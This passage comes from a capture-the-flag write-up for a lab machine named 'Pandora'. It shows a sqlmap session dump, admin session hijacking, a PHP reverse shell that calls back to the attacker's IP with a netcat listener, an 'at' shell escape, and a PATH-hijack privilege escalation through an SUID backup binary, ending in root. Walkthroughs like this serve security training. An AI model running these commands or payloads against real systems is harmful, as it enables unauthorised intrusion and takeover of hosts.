| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| tg6ehatvu0t8dps35nod40ph1c | NULL | 1648661158 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
| ur7c35ngmoai7gs36odft79f9j | NULL | 1648661348 |
+----------------------------+-----------------------------------------------------+-------------+
[13:29:22] [INFO] table 'pandora.tsessions_php' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/pandora/tsessions_php.csv'
[13:29:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'
[*] ending @ 13:29:22 /2022-03-30/
So we have session values for admin also
Other tables look like less interesting
Cracking the matt password hash did not work, seems like we have to move on with the session values
After injecting the session of admin and reloading it displays a dashboard
So we have done session hijacking for admin user
Since we are able to access Admin Tools in the dashboard, we can have RCE by uploading PHP reverse shell as zip which is mentioned in this exploit video
Using pentester monkey PHP reverse shell,
┌──(kali㉿aidenpearce369)-[~]
└─$ head shell.php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.5'; // CHANGE THIS
$port = 9876; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
┌──(kali㉿aidenpearce369)-[~]
└─$ zip shell.zip shell.php
adding: shell.php (deflated 60%)
After uploading this zip, try to load the file manager page to execute this shell
┌──(kali㉿aidenpearce369)-[~]
└─$ nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.136] 59936
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
17:51:13 up 2:56, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.14.5 16:16 12:56 0.18s 0.18s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$whoami
matt
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ cd /home/matt
$ cat user.txt
<USER FLAG>
Escalating Privileges To Root
Listing the SUID binaries,
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
Its time to exploit /usr/bin/pandora_backup
Changing to interactive shell,
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
matt@pandora:/home/matt$ ls
ls
user.txt
Copying the SUID binary to local machine,
matt@pandora:/home/matt$ cp /usr/bin/pandora_backup .
cp /usr/bin/pandora_backup .
matt@pandora:/home/matt$ ls
ls
pandora_backup user.txt
matt@pandora:/home/matt$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.5 - - [30/Mar/2022 17:58:54] "GET /pandora_backup HTTP/1.1" 200 -
After using the strings on the binary, we can see its operation
┌──(kali㉿aidenpearce369)-[~]
└─$ strings pandora_backup
...
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
...
Inorder to exploit this, we need an elevated shell with no restriction, for that we can use /usr/bin/at SUID binary to bypass it,
Now we can confirm that we have an elevated shell,
matt@pandora:/$ ls /tmp
ls /tmp
matt@pandora:/$
echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
matt@pandora:/$
<(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 2 at Wed Mar 30 18:23:00 2022
/bin/sh: 0: can't access tty; job control turned off
$ $ ls /tmp
ls /tmp
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-apache2.service-g5jfnj
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-logind.service-r0r3ug
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-resolved.service-dpsyag
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-timesyncd.service-6opwTh
tmux-1001
vmware-root_697-3988163015
We can easily exploit this SUID binary to drop root shell, because the tar command used here does’nt use absolute path
Now crafting our malicious tar binary and abusing the $PATH variable,
$ cd /tmp
cd /tmp
$ echo "/bin/sh -p" >tar
echo "/bin/sh -p" >tar
$ chmod +x tar
chmod +x tar
$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
$ /usr/bin/pandora_backup
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
/bin/sh: 0: can't access tty; job control turned off
# id
id
uid=0(root) gid=1000(matt) groups=1000(matt)
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>